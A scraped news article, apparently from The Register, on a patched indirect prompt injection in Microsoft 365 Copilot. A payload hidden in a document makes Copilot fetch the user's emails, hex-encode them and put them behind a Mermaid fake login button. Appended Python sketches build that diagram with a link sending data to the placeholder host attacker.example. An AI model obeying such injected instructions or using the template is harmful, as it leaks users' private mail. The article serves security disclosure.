Article Details
Scrape Timestamp (UTC): 2025-10-24 19:06:55.028
Source: https://www.theregister.com/2025/10/24/m365_copilot_mermaid_indirect_prompt_injection/
Original Article Text
Sneaky Mermaid attack in Microsoft 365 Copilot steals data

Redmond says it's fixed this particular indirect prompt injection vuln.

Microsoft fixed a security hole in Microsoft 365 Copilot that allowed attackers to trick the AI assistant into stealing sensitive tenant data – like emails – via indirect prompt injection attacks. But the researcher who found and reported the bug to Redmond won't get a bug bounty payout, as Microsoft determined that M365 Copilot isn't in scope for the vulnerability reward program.

The attack uses indirect prompt injection – embedding malicious instructions in content the model processes, such as a document – as opposed to direct prompt injection, in which someone submits malicious instructions to an AI system directly.

Researcher Adam Logue discovered the data-stealing exploit, which abuses M365 Copilot's built-in support for Mermaid, a JavaScript-based tool that generates diagrams from text definitions. In addition to integrating with M365 Copilot, Mermaid diagrams also support CSS.

"This opens up some interesting attack vectors for data exfiltration, as M365 Copilot can generate a mermaid diagram on the fly and can include data retrieved from other tools in the diagram," Logue wrote in a blog post about the bug and how to exploit it.

As a proof of concept, Logue asked M365 Copilot to summarize a specially crafted financial report document with an indirect prompt injection payload hidden inside it, triggered by the seemingly innocuous "summarize this document" request. The payload uses M365 Copilot's search_enterprise_emails tool to fetch the user's recent emails, and instructs the AI assistant to generate a bulleted list of the fetched contents, hex-encode the output, and split the hex-encoded string into multiple lines of up to 30 characters each.

Logue then exploited M365 Copilot's Mermaid integration to generate a diagram that looked like a login button, along with a notice that the document couldn't be viewed unless the user clicked the button. The fake login button contained CSS style elements with a hyperlink to an attacker-controlled server – in this case, Logue's Burp Collaborator server. When a user clicked the button, the hex-encoded tenant data – here, a bulleted list of recent emails – was sent to the malicious server.

From there, an attacker could decode the data and do all the nefarious things criminals do with stolen data: sell it to other crims, extort the victim for its return, uncover account numbers and/or credentials inside the messages, and other super fun stuff – if you are evil.

Logue reported the flaw to Microsoft, and Redmond told him it had patched the vulnerability, which he verified by trying the attack again and failing. But the decision-makers on such things also determined that M365 Copilot was out of scope for its bug bounty program, and therefore not eligible for a reward.

The Register asked Microsoft for more details about the patch and the out-of-scope determination, and will update this story if and when we receive a response.
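To make the encoding step concrete, here is a minimal Python sketch of what the payload instructed Copilot to do with the fetched emails: hex-encode the text and split it into lines of at most 30 characters. The sample input and function name are invented for illustration; in the actual PoC, Copilot itself performed these steps on real tenant data.

    # Sketch of the encoding step: hex-encode fetched text and split it
    # into lines of up to 30 characters each. Sample text is invented.
    def hex_chunks(text: str, width: int = 30) -> list[str]:
        encoded = text.encode("utf-8").hex()
        return [encoded[i:i + width] for i in range(0, len(encoded), width)]

    for line in hex_chunks("From: ceo@example.test - Q3 figures attached"):
        print(line)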
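And a sketch of the kind of Mermaid definition the exfiltration relies on: a single node styled as a login button, with a click link that smuggles the encoded data to an attacker-controlled server. The hostname, query parameter, and styling are placeholders, not Logue's actual payload.

    # Hypothetical Mermaid diagram definition of the kind described:
    # a node styled as a login button whose click target carries the
    # hex-encoded data to an attacker-controlled host (placeholder names).
    def exfil_diagram(payload_hex: str, collaborator: str) -> str:
        return "\n".join([
            "graph TD",
            '    btn["Login to view this document"]',
            f'    click btn "https://{collaborator}/?d={payload_hex}"',
            "    classDef button fill:#2d6cdf,color:#fff,stroke:#1b4aa0",
            "    class btn button",
        ])

    print(exfil_diagram("48656c6c6f", "attacker.example"))

Rendered by Copilot, such a diagram looks like an ordinary button; the data theft only requires the victim to click it.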
Daily Brief Summary
Microsoft addressed a security vulnerability in Microsoft 365 Copilot that allowed data theft through indirect prompt injection attacks, potentially exposing sensitive tenant information such as emails.
The attack hid malicious instructions inside a document and abused Copilot's built-in support for Mermaid, a JavaScript-based diagramming tool, as the channel for unauthorized data exfiltration.
Researcher Adam Logue, who discovered the flaw, demonstrated how the attack could retrieve and encode user emails, sending them to a malicious server via a fake login button.
Despite the successful identification and reporting of the bug, Microsoft deemed M365 Copilot outside the scope of its bug bounty program, resulting in no reward for the researcher.
The researcher verified the patch by re-running the attack, which failed, preventing further exploitation of this specific vulnerability, though the incident raises concerns about the security of AI-driven tools that handle sensitive data.
Organizations using AI tools like M365 Copilot should remain vigilant and ensure robust security measures are in place to mitigate similar risks.
The incident underscores the importance of expanding bug bounty programs to cover emerging technologies and platforms to encourage proactive vulnerability discovery and reporting.